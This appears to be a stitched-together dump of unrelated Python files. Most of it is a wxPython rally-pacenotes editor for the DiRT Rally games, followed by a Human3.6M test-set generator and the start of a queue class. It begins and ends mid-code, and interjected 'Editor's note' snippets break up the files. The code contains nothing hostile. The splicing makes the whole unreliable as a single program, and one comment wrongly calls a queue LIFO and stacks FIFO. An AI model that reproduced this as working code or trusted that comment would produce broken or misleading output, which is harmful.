panel_sizer = wx.BoxSizer(wx.VERTICAL) panel_sizer.Add(self.scrolled_panel, 1, wx.EXPAND | wx.ALL, 10) panel_sizer.AddSpacer(5) panel_sizer.Add(self.h_box_buttons, 0, wx.EXPAND | wx.ALIGN_LEFT | wx.LEFT, 20) panel_sizer.AddSpacer(5) panel_sizer.Add(self.h_box_input, 0, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 10) panel_sizer.AddSpacer(5) panel_sizer.Add(self.h_box_labels, 0, wx.EXPAND | wx.ALL, 10) panel_sizer.AddSpacer(5) panel_sizer.Add(self.tabs, 1, wx.EXPAND | wx.RIGHT | wx.LEFT | wx.BOTTOM, 10) self.SetSizer(panel_sizer) class DiRTyPacenotes(wx.Frame): def __init__(self, *args, **kwargs): super(DiRTyPacenotes, self).__init__(*args, **kwargs) self.SetName('frame_main') self.title = 'DiRTy Pacenotes' self.icon = wx.Icon(os.path.join(img_path, 'favicon.ico')) self.font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT) self.SetMinSize(wx.Size(480, 360)) self.SetSize(wx.Size(480, 720)) self.SetTitle(self.title) self.SetIcon(self.icon) config = self.get_config() self.ip = config['ip'] self.port = int(config['port']) self.server = (self.ip, self.port) self.co_driver = config['co_driver'] self.delay = int(config['delay']) self.interval = int(config['interval']) self.volume = int(config['volume']) self.countdown = ast.literal_eval(config['countdown']) self.handbrake = config['handbrake'] if not self.co_driver: # First run. self.show_settings() if not self.co_driver: sys.exit() q_cfg.put_nowait((self.server, self.co_driver, self.delay-100, self.volume, self.countdown)) self.co_path = os.path.join(app_path, 'co-drivers', self.co_driver) self.pace_path = os.path.join(self.co_path, 'pacenotes') self.sound_path = os.path.join(self.co_path, 'sounds') self.sound_list = defaultdict(list) self.sounds_csv = os.path.join(self.co_path, 'sounds.csv') self.dic_stages = defaultdict(list) self.read_stages() self.read_audio() self.file_handle = '' self.file_name = '' self.radios = [] self.dist = 0 self.pace = '' self.stage_name = '' self.stage_path = '' # self.stage_length = '' self.delay_mode = '' self.curr_dist = 0 self.curr_line = None self.prev_line = None self.last_dist = -20 self.cbs = set() self.cbs_by_id = set() self.checkboxes = set() self.line_pace = None self.line_pace_by_id = 0 self.from_, self.to_ = (0, 0) self.sel_length = 0 self.line_end = 0 self.dic_lines = {} self.dic_entries = {} self.end = 0 self.count_error = 0 self.count_auto = 0 self.hint = 'pacenotes' self.modified = False self.restart = False self.timer_error = wx.Timer(self) self.timer_auto = wx.Timer(self) self.menu_bar = MenuBar(self) self.menu_bar.Append(self.menu_bar.file_menu, '&File') self.menu_bar.Append(self.menu_bar.edit_menu, '&Edit') self.menu_bar.Append(self.menu_bar.autosave_menu, '&Autosave') self.menu_bar.Append(self.menu_bar.delay_menu, '&Pacenotes') self.menu_bar.Append(self.menu_bar.help_menu, '&Help') self.SetMenuBar(self.menu_bar) self.menu_bar.EnableTop(1, False) self.menu_bar.EnableTop(2, False) self.menu_bar.EnableTop(3, False) self.editor = Editor(self) self.read_sounds() self.reload_sounds() self.persist_manager = per.PersistenceManager.Get() config_file = os.path.join(data_path, self.editor.tabs.GetName()) self.persist_manager.SetPersistenceFile(config_file) # self.persist_manager.RegisterAndRestore(self.editor.tabs) self.statusbar = self.CreateStatusBar() self.statusbar.SetName('status') self.statusbar.SetStatusText('Processing audio files, please wait...') self.taskbar = TaskBar(self) # Create taskbar icon. self.reader = Reader() # Start UDP thread. 
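# Editor's note: illustrative sketch; __init__ continues below with the
# pub.subscribe() wiring.  The GUI thread and the Reader thread communicate in
# one direction with module-level queues (settings such as volume, delay and
# the stop flag are pushed with put_nowait()), and in the other direction via
# wx.CallAfter(pub.sendMessage, ...) so UI updates run on the main thread.
# A minimal standalone sketch of the non-blocking polling side (the queue and
# function names here are local to the sketch, not the module's q_* queues):

import queue

def poll_setting(q, current):
    """Return the newest value from q, or `current` if nothing was sent."""
    try:
        value = q.get_nowait()
        q.task_done()
        return value
    except queue.Empty:
        return current

q_volume = queue.Queue()
q_volume.put_nowait(7)
volume = poll_setting(q_volume, 5)  # -> 7; returns the fallback once drained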
pub.subscribe(self.get_progress, 'get_progress') pub.subscribe(self.get_stage, 'get_stage') pub.subscribe(self.get_dist, 'get_dist') pub.subscribe(self.get_pause, 'get_pause') pub.subscribe(self.key_error, 'key_error') # pub.subscribe(self.get_stage_length, 'get_stage_length') self.progress = wx.Gauge(self.statusbar, pos=(265, 4), range=self.loaded_max) self.Bind(wx.EVT_TIMER, self.on_timer_error, self.timer_error) self.Bind(wx.EVT_TIMER, self.on_timer_auto, self.timer_auto) self.Bind(wx.EVT_CLOSE, self.on_quit) wx.CallAfter(self.register_controls) # Define methods. # Creator. def add_category(self, event): dlg = wx.TextEntryDialog(self, 'Specify a name for the new category', 'CATEGORY NAME') if dlg.ShowModal() == wx.ID_OK and dlg.GetValue(): tab_right = wx.Panel(self.creator.tabs_right, style=wx.TAB_TRAVERSAL | wx.BORDER_NONE, name=dlg.GetValue(), id=2) tab_right.SetBackgroundColour('white') tab_right.SetCursor(wx.Cursor(wx.CURSOR_HAND)) list_box_right = wx.ListBox(tab_right, style=wx.LB_MULTIPLE) h_box_tabs = wx.BoxSizer(wx.HORIZONTAL) h_box_tabs.Add(list_box_right, 0, wx.EXPAND) tab_right.SetSizer(h_box_tabs) list_box_right.Bind(wx.EVT_LISTBOX, self.on_listbox_right) self.creator.tabs_right.AddPage(tab_right, dlg.GetValue(), True) dlg.Destroy() def on_listbox_left(self, event): if event.GetExtraLong(): self.creator.selection_left.append(event.GetString()) else: self.creator.selection_left.remove(event.GetString()) if self.creator.selection_left: self.creator.button_in.Enable() else: self.creator.button_in.Disable() def on_listbox_right(self, event): if event.GetExtraLong(): self.creator.selection_right.append(event.GetString()) else: self.creator.selection_right.remove(event.GetString()) if self.creator.selection_right: self.creator.button_out.Enable() else: self.creator.button_out.Disable() def sounds_in(self, event): if self.creator.selection_left: for child_right in self.creator.tabs_right.GetCurrentPage().GetChildren(): child_right.InsertItems(self.creator.selection_left, child_right.GetCount()) for child_left in self.creator.tabs_left.GetCurrentPage().GetChildren(): sel_list = child_left.GetSelections() sel_list.reverse() for selected in sel_list: child_left.Delete(selected) self.creator.selection_left.clear() self.creator.button_in.Disable() else: pass def sounds_out(self, event): if self.creator.selection_right: for child_left in self.creator.tabs_left.GetCurrentPage().GetChildren(): child_left.InsertItems(self.creator.selection_right, child_left.GetCount()) for child_right in self.creator.tabs_right.GetCurrentPage().GetChildren(): sel_list = child_right.GetSelections() sel_list.reverse() for selected in sel_list: child_right.Delete(selected) self.creator.selection_right.clear() self.creator.button_out.Disable() else: pass def on_tab_close(self, event): sel_list = [] children = self.creator.tabs_right.GetCurrentPage().GetChildren() for child in children: for row in range(child.GetCount()): sound = child.GetString(row) sel_list.append(sound) for child_left in self.creator.tabs_left.GetCurrentPage().GetChildren(): child_left.InsertItems(sel_list, child_left.GetCount()) def reset_sounds(self, event): self.creator.create_audio() self.creator.create_sounds() def diff(self, l_one, l_two): return list(set(l_one) - set(l_two)) # DiRTy Pacenotes def register_controls(self): self.Freeze() self.register() self.Thaw() def register(self, children=None): if children is None: self.persist_manager.RegisterAndRestore(self) children = self.GetChildren() for child in children: name1 = 
child.GetName() grandchildren = child.GetChildren() for grandchild in grandchildren: name2 = grandchild.GetName() def on_play(self, event=None): snd = self.editor.input_pace.GetValue().split() for sound_name in snd: try: sound_pace = sound_bank[sound_name] + self.volume play(sound_pace) except KeyError: self.key_error(sound_name) pass def on_cancel(self, event): self.clear_input_pace() def read_audio(self): snd_file_list = glob.glob(self.sound_path + '/*') q_snd.put_nowait(snd_file_list) self.loaded_max = len(snd_file_list) def get_progress(self, arg): self.progress.SetValue(arg) if arg == self.loaded_max: self.progress.Destroy() self.SetStatusText('Open pacenotes file or start recce') def get_pause(self, arg): self.pause = arg def read_sounds(self): try: self.sound_list.clear() with open(self.sounds_csv, 'r') as csv_file: csv_data = csv.DictReader(csv_file) for row in csv_data: pair = list(row.items()) # list of tuples of (key, value) pairs for key, value in pair: if value: self.sound_list[key].append(value) # dict with multiple values for same keys except IOError: wx.MessageBox('Create your co-driver', 'CO-DRIVER ERROR', wx.OK | wx.ICON_ERROR) self.show_creator() self.read_sounds() def on_creator(self, event): self.show_creator() def show_creator(self): self.creator = Creator(self) self.creator.ShowModal() def on_settings(self, event): self.show_settings() def show_settings(self): self.settings = Settings(self) self.settings.ShowModal() def read_stages(self): try: with open(os.path.join(app_path, 'data\\stages.csv'), 'r') as f: _ = next(f) for line in f: row = line.strip() lis = row.partition(',') # tuple key = float(lis[0]) # key as float val = lis[2] # value as string self.dic_stages[key].append(val) # dictionary except IOError: self.SetStatusText('stages.csv file not found') self.on_error() q_stg.put_nowait(self.dic_stages) def get_config(self): if not os.path.exists(config_ini): self.create_config(self) return ConfigObj(config_ini) @staticmethod def create_config(self): # Set default values for config.ini. config = ConfigObj(config_ini) config['ip'] = '127.0.0.1' config['port'] = '20777' config['co_driver'] = '' config['delay'] = '200' config['interval'] = '1000' config['volume'] = '5' config['countdown'] = 'True' config['handbrake'] = 'N/A' config.write() @staticmethod def update_config(self): config = ConfigObj(config_ini) config['ip'] = self.ip config['port'] = self.port config['co_driver'] = self.co_driver config['delay'] = self.delay config['interval'] = self.interval config['volume'] = self.volume config['countdown'] = self.countdown config['handbrake'] = self.handbrake config.write() def on_change_handbrake(self, event): self.change_handbrake(self) @staticmethod def change_handbrake(self): # hand_input = HandInput() pass def get_stage(self, arg1, arg2): if self.stage_name: if arg1 != self.stage_name and self.modified: dlg = wx.MessageDialog(self, 'Do you want to save ' + self.file_name + '?', 'Confirm', wx.YES_NO | wx.YES_DEFAULT | wx.ICON_QUESTION) if dlg.ShowModal() == wx.ID_YES: self.write_file() wx.MessageBox(self.file_name + ' has been saved', 'Confirmation', wx.OK | wx.ICON_INFORMATION) self.stage_name = arg1 self.stage_path = arg2 self.update_stage() def update_stage(self): # From UDP stream. 
self.file_name = self.stage_name + '.txt' self.open_file() self.menu_bar.EnableTop(3, True) self.menu_bar.menu_open.Enable(False) self.editor.slider_volume.Enable() self.editor.button_play.Enable() self.editor.label_delay.SetForegroundColour('dark grey') q_vol.put_nowait(self.volume) self.update_delay() def get_dist(self, arg1, arg2): self.curr_dist = arg1 self.last_dist = arg2 self.update_dist() def update_dist(self): if self.curr_dist >= 0 and not self.editor.input_dist.HasFocus(): self.editor.input_dist.SetValue(self.curr_dist) # Manage scrolling. sort_keys = sorted(list(self.dic_lines.keys()), key=int) lines = [] for index, d in enumerate(sort_keys): lines.append(index) if index < (len(sort_keys)): self.curr_line = self.dic_lines[sort_keys[index]] self.prev_line = self.dic_lines[sort_keys[index - 1]] if self.curr_dist > self.last_dist: if self.curr_dist == int(d) - (self.delay - 100): # print self.editor.scrolled_panel.GetScrollPos(wx.VERTICAL), 'pos' # print self.editor.scrolled_panel.GetScrollLines(wx.VERTICAL), 'lines' self.curr_line.SetFont(self.font.Bold()) self.prev_line.SetFont(self.font) # print index, d, 'index' # TODO if index > 1: self.editor.scrolled_panel.ScrollLines(3) self.Refresh() # elif self.curr_dist < self.last_dist: # If going wrong way. # self.curr_line.SetFont(self.font) # self.prev_line.SetFont(self.font) # self.Refresh() elif self.curr_dist == 0: # If at the start line. self.editor.scrolled_panel.Scroll(0, 0) for l in lines: self.curr_line = self.dic_lines[sort_keys[l]] self.curr_line.SetFont(self.font) self.Refresh() ''' def get_stage_length(self, arg): self.stage_length = arg self.update_length() def update_length(self): self.editor.label_length.SetLabel(str(self.stage_length)) ''' def on_delay(self, event): self.delay = event.GetId() q_del.put_nowait(self.delay - 100) self.update_delay() delay = self.menu_bar.delay_menu.FindItemById(self.delay).GetItemLabelText() self.SetStatusText('Pacenote calls set to ' + delay) def update_delay(self): if self.delay == 100: self.delay_mode = 'RECCE' else: self.delay_mode = 'STAGE' self.editor.label_delay.SetLabel(self.delay_mode) def key_error(self, arg): self.statusbar.SetStatusText('\'' + arg + '\'' + ' not found in ' + self.co_driver + '\'s Sounds folder') self.on_error() def on_error(self): self.statusbar.SetBackgroundColour('RED') self.statusbar.Refresh() self.timer_error.Start(50) def on_timer_error(self, event): self.count_error = self.count_error + 1 if self.count_error == 25: self.statusbar.SetBackgroundColour('white') self.statusbar.Refresh() self.timer_error.Stop() self.count_error = 0 def on_autosave(self): self.count_auto = 0 if self.interval == 1000: self.SetStatusText('Autosave OFF') else: self.timer_auto.Start(60000) self.SetStatusText('Autosave set to ' + str(self.interval) + ' minutes') def on_timer_auto(self, event): self.count_auto = self.count_auto + 1 if self.count_auto == self.interval: self.write_file() self.SetStatusText('File ' + self.file_name + ' has been auto-saved.') self.on_autosave() def on_interval(self, event): self.timer_auto.Stop() evt = event.GetEventObject() self.interval = event.GetId() self.on_autosave() def on_quit(self, event): if self.stage_name and self.modified: dlg = wx.MessageDialog(self, 'Do you want to save ' + self.file_name + '?', 'Confirm', wx.YES_NO | wx.YES_DEFAULT | wx.ICON_WARNING) dlg_choice = dlg.ShowModal() if dlg_choice == wx.ID_YES: self.write_file() dlg = wx.MessageDialog(self, self.file_name + ' has been saved', 'Confirmation', wx.OK | wx.ICON_INFORMATION) 
dlg.ShowModal() elif not self.stage_name: # from 'Create your co-driver' pass self.persist_manager.SaveAndUnregister(self.editor.tabs) pub.unsubAll() udp_running = False q_run.put_nowait(udp_running) self.reader.join(0.5) self.update_config(self) self.taskbar.Destroy() self.Destroy() def on_save(self, event): if event.GetId() == wx.ID_SAVE: # From menu. if self.checkboxes: if self.modified: self.write_file() self.SetStatusText(self.file_name + ' has been saved') else: self.SetStatusText(self.file_name + ' has not been modified yet') self.on_error() else: self.SetStatusText('There are no pacenotes to save') self.on_error() def on_reload(self, event): if event.GetId() == 1: # From Creator. for child in self.creator.tabs_right.GetChildren(): category = child.GetName() if category != 'panel': for grandchild in child.GetChildren(): sound_list = [] sound_dict = {} for row in range(grandchild.GetCount()): sound = grandchild.GetString(row) if sound: sound_list.append(sound) sound_list.sort() sound_dict[category] = sound_list self.creator.dict_list_c.update(sound_dict) if not self.creator.dict_list_c: wx.MessageBox('Create at least one category', 'CO-DRIVER ERROR', wx.OK | wx.ICON_ERROR) elif self.creator.dict_list_c: check = False for k, v in self.creator.dict_list_c.items(): if not v: check = True if check: wx.MessageBox('At least one category is empty', 'CO-DRIVER ERROR', wx.OK | wx.ICON_ERROR) else: keys = self.creator.dict_list_c.keys() with open(self.sounds_csv, 'w', newline='') as f: writer = csv.writer(f, delimiter=",") writer.writerow(keys) writer.writerows(itertools.zip_longest(*[self.creator.dict_list_c[key] for key in keys])) self.creator.Destroy() self.reload_sounds() elif event.GetId() == 2: # From settings. if self.co_driver: self.ip = self.settings.ip_value.GetValue() self.port = self.settings.port_value.GetValue() self.co_driver = self.settings.combo_co_driver.GetValue() self.countdown = self.settings.count_check.GetValue() self.update_config(self) self.on_quit(event) self.restart_app(self) else: # First run. 
self.ip = self.settings.ip_value.GetValue() self.port = self.settings.port_value.GetValue() self.co_driver = self.settings.combo_co_driver.GetValue() self.countdown = self.settings.count_check.GetValue() if not self.co_driver: wx.MessageBox('Choose your co-driver', 'CO-DRIVER OPTION', wx.OK | wx.ICON_WARNING) return self.update_config(self) self.settings.Destroy() def write_file(self): self.file_handle = os.path.join(self.stage_path, self.file_name) with open(self.file_handle, 'w') as f: for dist in sorted(self.dic_entries, key=int): pace = self.dic_entries[dist] line = '{},{}'.format(dist, pace) f.write(line + '\n') self.modified = False def on_open(self, event): if self.stage_name and self.checkboxes and self.modified: dlg = wx.MessageDialog(self, 'Do you want to save ' + self.file_name + '?', 'Confirm', wx.YES_NO | wx.YES_DEFAULT | wx.ICON_WARNING) dlg_choice = dlg.ShowModal() if dlg_choice == wx.ID_YES: self.on_save(event) dlg = wx.FileDialog(self, 'Open pacenotes file', self.pace_path, '', 'Text files (*.txt)|*.txt', wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) if dlg.ShowModal() == wx.ID_OK: self.file_name = dlg.GetFilename() self.stage_path = dlg.GetDirectory() self.stage_name, ext = os.path.splitext(self.file_name) self.open_file() dlg.Destroy() self.editor.label_delay.SetLabel('NOTES') def open_file(self): self.editor.scrolled_panel.DestroyChildren() self.dic_entries.clear() self.dic_lines.clear() self.SetTitle(self.title) file_handle = os.path.join(self.stage_path, self.file_name) try: with open(file_handle, 'r') as f: for line in f: if line and line.split(): lis = line.partition(',') # tuple self.dist = int(lis[0]) self.pace = lis[2] self.create_pacenotes() else: continue except IOError: self.SetStatusText(self.file_name + ' not found in ' + self.co_driver + '\'s Pacenotes folder') self.on_error() return self.menu_bar.menu_save.Enable(True) self.menu_bar.EnableTop(1, True) self.menu_bar.EnableTop(2, True) self.editor.input_pace.Clear() self.editor.input_pace.SetHint(self.hint) self.editor.tabs.Enable() self.editor.input_dist.Enable() self.editor.button_play.Disable() for button in self.editor.buttons: button.Disable() self.SetTitle(self.title + ' - ' + self.stage_name) self.modified = False self.on_autosave() def create_pacenotes(self): text_dist = ict.IntCtrl(self.editor.scrolled_panel, id=self.dist, name='dist', value=self.dist, min=1, max=19999, size=wx.Size(45, 23), style=wx.TE_PROCESS_ENTER, limited=True, allow_none=False) text_pace = wx.TextCtrl(self.editor.scrolled_panel, id=self.dist, name='pace', value=self.pace) tick = wx.CheckBox(self.editor.scrolled_panel, id=int(self.dist), name='tick') text_pace.SetEditable(False) text_pace.SetCursor(wx.Cursor(wx.CURSOR_ARROW)) h_box_scr = wx.BoxSizer(wx.HORIZONTAL) h_box_scr.Add(tick, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT, 3) h_box_scr.Add(text_dist, 0, wx.LEFT, 2) h_box_scr.Add(text_pace, 1, wx.EXPAND | wx.LEFT, 1) self.editor.v_box.Add(h_box_scr, 0, wx.EXPAND | wx.BOTTOM, 1) self.editor.scrolled_panel.Layout() self.editor.scrolled_panel.FitInside() self.end = self.editor.scrolled_panel.GetScrollLines(wx.VERTICAL) text_dist.Bind(wx.EVT_TEXT_ENTER, self.on_distance) text_pace.Bind(wx.EVT_MOUSE_CAPTURE_CHANGED, self.on_selection) self.Bind(wx.EVT_CHECKBOX, self.on_tick) self.dic_lines[self.dist] = text_pace self.dic_entries[self.dist] = self.pace.strip('\n') self.checkboxes.add(tick) def reload_pacenotes(self): self.editor.scrolled_panel.DestroyChildren() self.checkboxes.clear() for dist in sorted(self.dic_entries, key=int): self.dist = 
int(dist) self.pace = self.dic_entries[dist].strip('\n') self.create_pacenotes() q_dic.put_nowait(self.dic_entries) self.modified = True def reload_sounds(self): self.read_sounds() self.editor.tabs.DeleteAllPages() for category, sounds_list in list(self.sound_list.items()): tab = wx.Panel(self.editor.tabs, name=category) tab.SetCursor(wx.Cursor(wx.CURSOR_HAND)) list_ctrl = ulc.UltimateListCtrl(tab, agwStyle=ulc.ULC_BORDER_SELECT | ulc.ULC_SORT_ASCENDING | ulc.ULC_SINGLE_SEL | ulc.ULC_HOT_TRACKING | wx.LC_LIST) for index, sound in enumerate(sounds_list): list_ctrl.InsertStringItem(index, sound) h_box_tabs = wx.BoxSizer(wx.HORIZONTAL) h_box_tabs.Add(list_ctrl, 1, wx.EXPAND) tab.SetSizer(h_box_tabs) self.editor.tabs.AddPage(tab, category) self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.on_pacenote) if not self.stage_name: self.editor.tabs.Disable() # self.editor.Refresh() def clear_input_pace(self): self.editor.input_pace.Clear() self.editor.input_pace.SetHint(self.hint) self.editor.input_dist.SetFocus() for button in self.editor.buttons: button.Disable() self.editor.button_play.Disable() def on_add(self, event): self.dist = self.editor.input_dist.GetValue() if self.stage_name: if self.dist != 0: for dist in self.dic_entries: if self.dist == dist: dlg = wx.MessageDialog(self, 'Replace pacenotes for current distance?', 'Confirm', wx.YES_NO | wx.NO_DEFAULT | wx.ICON_QUESTION) dlg_choice = dlg.ShowModal() if dlg_choice == wx.ID_YES: self.add_pacenotes() sort_keys = sorted(list(self.dic_lines.keys()), key=int) for index, d in enumerate(sort_keys): if self.dist == d: self.editor.scrolled_panel.Scroll(0, index) self.SetStatusText('Pacenotes replaced') return elif dlg_choice == wx.ID_NO: dlg.Destroy() self.SetStatusText('Operation cancelled') return self.add_pacenotes() sort_keys = sorted(list(self.dic_lines.keys()), key=int) for index, d in enumerate(sort_keys): if self.dist == d: self.editor.scrolled_panel.Scroll(0, index) self.SetStatusText('Pacenotes added') else: self.SetStatusText('Distance cannot be 0') self.on_error() else: self.SetStatusText('Open pacenotes text file or run a stage first') self.on_error() def add_pacenotes(self): self.pace = self.editor.input_pace.GetValue() self.dic_entries[self.dist] = self.pace.strip('\n') self.reload_pacenotes() self.editor.button_add.Disable() self.editor.button_insert.Disable() self.editor.button_replace.Disable() self.clear_input_pace() def on_insert(self, event): if self.sel_length == 0 == self.from_: # Insert pacenote at the beginning of line. self.line_pace.SetInsertionPoint(self.from_) else: # Insert pacenote after selection. 
self.line_pace.SetInsertionPoint(self.to_) self.line_pace.WriteText(self.editor.input_pace.GetValue()) self.dic_entries[self.line_pace_by_id] = self.line_pace.GetValue().replace('\n', '') self.reload_pacenotes() self.editor.button_add.Disable() self.editor.button_insert.Disable() self.editor.button_replace.Disable() self.editor.button_delete.Disable() self.clear_input_pace() self.editor.button_play.Disable() sort_keys = sorted(list(self.dic_lines.keys()), key=int) for index, d in enumerate(sort_keys): if self.line_pace_by_id == int(d): self.editor.scrolled_panel.Scroll(0, index) self.SetStatusText('Pacenote inserted') def on_replace(self, event): self.line_pace.Replace(self.from_, self.to_, self.editor.input_pace.GetValue()) self.dic_entries[self.line_pace_by_id] = self.line_pace.GetValue().strip('\n') self.reload_pacenotes() self.editor.button_add.Disable() self.editor.button_insert.Disable() self.editor.button_replace.Disable() self.editor.button_delete.Disable() self.clear_input_pace() self.editor.button_play.Disable() sort_keys = sorted(list(self.dic_lines.keys()), key=int) for index, d in enumerate(sort_keys): if self.line_pace_by_id == int(d): self.editor.scrolled_panel.Scroll(0, index) self.SetStatusText('Pacenote replaced') def on_delete(self, event): if self.cbs_by_id: # Remove checked lines. for dist in self.cbs_by_id: del self.dic_entries[dist] del self.dic_lines[dist] self.cbs.clear() self.cbs_by_id.clear() self.checkboxes.clear() self.editor.button_delete.Disable() self.menu_bar.menu_select_all.Check(False) else: # Remove selected text. self.line_pace.Remove(self.from_, self.to_) dic_2 = {} dic_2[self.line_pace_by_id] = self.line_pace.GetValue().strip('\n') self.dic_entries.update(dic_2) self.reload_pacenotes() self.clear_input_pace() self.editor.button_play.Disable() sort_keys = sorted(list(self.dic_lines.keys()), key=int) for index, d in enumerate(sort_keys): if self.line_pace_by_id == int(d): self.editor.scrolled_panel.Scroll(0, index) self.SetStatusText('Pacenote deleted') def on_selection(self, event): self.line_pace = event.GetEventObject() line_pace_by_name = self.line_pace.GetName() self.line_pace_by_id = self.line_pace.GetId() self.from_, self.to_ = self.line_pace.GetSelection() self.line_end = self.line_pace.GetLastPosition() self.sel_length = self.to_ - self.from_ if self.cbs: # Clear any ticks. for cb in self.cbs: cb.SetValue(False) self.cbs.clear() self.cbs_by_id.clear() else: if line_pace_by_name == 'pace': if self.sel_length > 0: if self.editor.input_pace.GetValue(): self.editor.button_insert.Enable() self.editor.button_replace.Enable() self.editor.button_delete.Enable() else: self.editor.button_insert.Disable() self.editor.button_replace.Disable() self.editor.button_delete.Enable() elif self.sel_length == 0 == self.from_: self.editor.button_insert.Enable() self.editor.button_replace.Disable() self.editor.button_delete.Disable() else: # Prevent splitting words. self.editor.button_insert.Disable() self.editor.button_replace.Disable() self.editor.button_delete.Disable() def on_distance(self, event): line_dist = event.GetEventObject() line_dist_by_name = line_dist.GetName() line_dist_by_id = line_dist.GetId() self.dist = line_dist.GetValue() if self.dist: if line_dist_by_name == 'dist': # Processed by Enter. 
if self.dist != line_dist_by_id: self.dic_entries[self.dist] = self.dic_entries.pop(line_dist_by_id, '') self.dic_lines[self.dist] = self.dic_lines.pop(line_dist_by_id, '') self.reload_pacenotes() sort_keys = sorted(list(self.dic_lines.keys()), key=int) for index, d in enumerate(sort_keys): if self.line_pace_by_id == int(d): self.editor.scrolled_panel.Scroll(0, index) self.SetStatusText('Distance updated') else: self.statusbar.Refresh() elif line_dist_by_name == 'input': if self.editor.input_pace.GetValue(): self.editor.button_add.Enable() self.editor.button_play.Enable() else: self.editor.button_add.Disable() self.editor.button_play.Enable() def on_pacenote(self, event): if not self.editor.input_pace.GetValue(): # Get rid of pacenote hint. self.editor.input_pace.Clear() self.editor.button_play.Enable() self.editor.input_pace.AppendText(event.GetText() + ' ') if self.line_pace: # If text selected. if self.editor.input_dist.GetValue(): self.editor.button_add.Enable() self.editor.button_insert.Enable() self.editor.button_replace.Enable() elif not self.line_pace: if self.editor.input_dist.GetValue(): self.editor.button_add.Enable() self.editor.button_insert.Disable() self.editor.button_replace.Disable() else: for button in self.editor.buttons: button.Disable() def on_tick(self, event): self.editor.button_insert.Disable() self.editor.button_replace.Disable() cb = event.GetEventObject() cb_by_id = event.GetId() if cb_by_id != 20000: if cb.IsChecked(): self.cbs.add(cb) self.cbs_by_id.add(cb_by_id) self.editor.button_delete.Enable() self.menu_bar.menu_select_all.IsChecked() else: self.cbs.remove(cb) self.cbs_by_id.remove(cb_by_id) if not self.cbs: self.editor.button_delete.Disable() self.menu_bar.menu_select_all.Check(False) else: # Select All. for tick in self.checkboxes: tick_by_id = tick.GetId() if self.menu_bar.menu_select_all.IsChecked(): self.cbs.add(tick) self.cbs_by_id.add(tick_by_id) tick.SetValue(True) self.editor.button_delete.Enable() else: self.cbs.clear() self.cbs_by_id.clear() tick.SetValue(False) self.editor.button_delete.Disable() def on_undo_select(self, event): # stock_undo = [] # undo = self.text_pace.Undo() # stock_undo.append(undo) pass def on_slider(self, event): evt = event.GetEventObject() self.volume = evt.GetValue() q_vol.put_nowait(self.volume) def on_about(self, event): description = wordwrap('DiRTy Pacenotes lets you create your own pacenotes\n' 'for DiRT Rally and DiRT Rally 2.0 stages.\n' 'These custom pacenotes will be read by the co-driver of your choice.\n', 420, wx.ClientDC(self)) licence = wordwrap('Licensed under the Apache License, Version 2.0 (the "License");\n' 'you may not use this software except in compliance with the License.\n' 'You may obtain a copy of the License at\n' 'http://www.apache.org/licenses/LICENSE-2.0\n' 'Unless required by applicable law or agreed to in writing,\n' 'software distributed under the License is distributed on an "AS IS" BASIS,\n' 'WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,\n' 'either express or implied. 
See the License for the specific language\n' 'governing permissions and limitations under the License.', 420, wx.ClientDC(self)) icon = wx.Icon(os.path.join(img_path, 'icon.png')) info = wx.adv.AboutDialogInfo() info.SetName('DiRTy Pacenotes') info.SetVersion('2.5.1') info.SetIcon(icon) info.SetDescription(description) info.SetCopyright('(C) 2017 - 2019 ') info.SetLicence(licence) wx.adv.AboutBox(info) @staticmethod def restart_app(self): sys.stdout.flush() os.execl(sys.executable, sys.executable, *sys.argv) if __name__ == '__main__': app = wx.App() frame = DiRTyPacenotes(None) frame.Centre() frame.Show() app.MainLoop() # Copyright 2020 , , , , # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import os import numpy as np from tqdm import tqdm, trange if __name__ == "__main__": parser = argparse.ArgumentParser(''' Generates the Human3.6M testing set from the testing videos by extracting fixed-length sequences. Videos are saved in the npz format, like the training videos. ''') parser.add_argument('--data_dir', type=str, metavar='DIR', required=True, help='Folder where the dataset is stored and the testing set will be saved.') parser.add_argument('--size', type=int, metavar='SIZE', default=1000, help='Number of sequences to extract (size of the testing set).') parser.add_argument('--seq_len', type=int, metavar='LEN', default=53, help='Number of frames per sequence to extract.') parser.add_argument('--subsampling', type=int, metavar='SUB', default=8, help='Selects one in $SUB frames.') parser.add_argument('--seed', type=int, metavar='SEED', default=42, help='Fixed NumPy seed to produce the same dataset at each run.') args = parser.parse_args() # Fix random seed np.random.seed(args.seed) # Directory where the videos will be saved save_dir = os.path.join(args.data_dir, f'test_set_{args.seq_len}_{args.subsampling}') # Create the directory if needed if not os.path.exists(save_dir): os.makedirs(save_dir) print(f'Generating test set at {save_dir}...') video_files = sorted(os.listdir(os.path.join(args.data_dir, 'test'))) nb_videos = len(video_files) actual_seq_len = (args.seq_len - 1) * args.subsampling + 1 progress_bar = tqdm(total=args.size, ncols=0) # Randomly extract a determined number of videos for i in trange(args.size): # Randomly choose the video video_id = np.random.randint(nb_videos) video_path = os.path.join(args.data_dir, 'test', video_files[video_id]) video_data = {k: v for k, v in np.load(video_path).items()} video_length = video_data['image'].shape[0] # Randomly choose the beginning of the video extract to be included in the testing set t_0 = np.random.randint(video_length - actual_seq_len + 1) # Intermediary frames are kept for compatibility purposes when the dataset in loaded in the code of the model video_data['image'] = video_data['image'][t_0: t_0 + actual_seq_len:] video_data['frame'] = t_0 # Save the video np.savez(os.path.join(save_dir, f'test_{i}'), **video_data) uday256071/DataStructures-and-Algorithms0 # implement a queue (LIFO) using two stack(FIFO) class queue(): def 
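# Editor's aside (illustration only): the Human3.6M script above draws random windows of
# (seq_len - 1) * subsampling + 1 consecutive frames so that, after keeping every
# `subsampling`-th frame, exactly seq_len frames remain. A small sketch of that index
# arithmetic on a toy array (function and variable names here are hypothetical):
import numpy as np


def extract_window(frames, seq_len, subsampling, rng):
    """Pick a random start and return the full-rate window plus its subsampled view."""
    actual_seq_len = (seq_len - 1) * subsampling + 1
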